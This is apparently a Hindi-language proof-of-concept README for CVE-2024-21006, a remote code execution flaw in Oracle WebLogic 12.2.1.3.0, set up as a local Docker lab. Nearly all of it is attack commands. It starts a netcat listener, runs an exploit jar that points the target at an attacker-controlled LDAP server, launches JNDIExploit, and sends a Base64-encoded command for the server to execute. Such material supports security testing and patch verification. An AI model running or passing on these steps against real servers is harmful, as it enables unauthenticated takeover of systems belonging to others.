
दूरस्थ कोड निष्पादन (RCE) - Oracle WebLogic 12.2.1.3.0
CVE-2024-21006 Oracle WebLogic Server को प्रभावित करने वाली एक महत्वपूर्ण Remote Code Execution (RCE) भेद्यता है। यह दोष IIOP (Internet Inter-ORB Protocol) और JNDI (Java Naming and Directory Interface) प्रोटोकॉल के असुरक्षित उपयोग से संबंधित है, जो एक अनप्रमाणित दूरस्थ हमलावर को एक दुर्भावनापूर्ण JNDI संदर्भ के माध्यम से प्रभावित सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देता है।
परिवेश को स्थापित करें:
docker-compose up -d
Kali Shell तक पहुँचने के लिए:
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
WebLogic Shell तक पहुँचने के लिए:
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
ExploitBox Shell तक पहुँचने के लिए:
docker exec -it exploitbox /bin/bash
इस चरण में, हमारे पास स्थानीय रूप से चल रहा WebLogic 12.2.1.3.0 का एक उदाहरण है: http://127.0.0.1:7001/console/login/LoginForm.jsp

Kali पर:
nc -vnlp 1389
ExploitBox पर:
java -jar CVE-2024-21006.jar <WebLogic IP> 7001 ldap://<Kali IP>:1389
ध्यान दें कि Kali को WebLogic से कनेक्शन प्राप्त हुआ:

Kali पर, JNDIExploit प्रारंभ करें:
cd /exploit
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <Kali IP>

ExploitBox पर, एक्सप्लॉइट चलाएँ:
java -jar CVE-2024-21006.jar <WebLogic IP> 7001 "ldap://<Kali IP>:1389/Basic/Command/Base64/<Base64 कमांड>"

Kali पर, देखें कि हमें अनुरोध प्राप्त हुआ:

WebLogic पर, देखें कि कमांड निष्पादित हुआ और फ़ाइल सफलतापूर्वक बनाई गई:
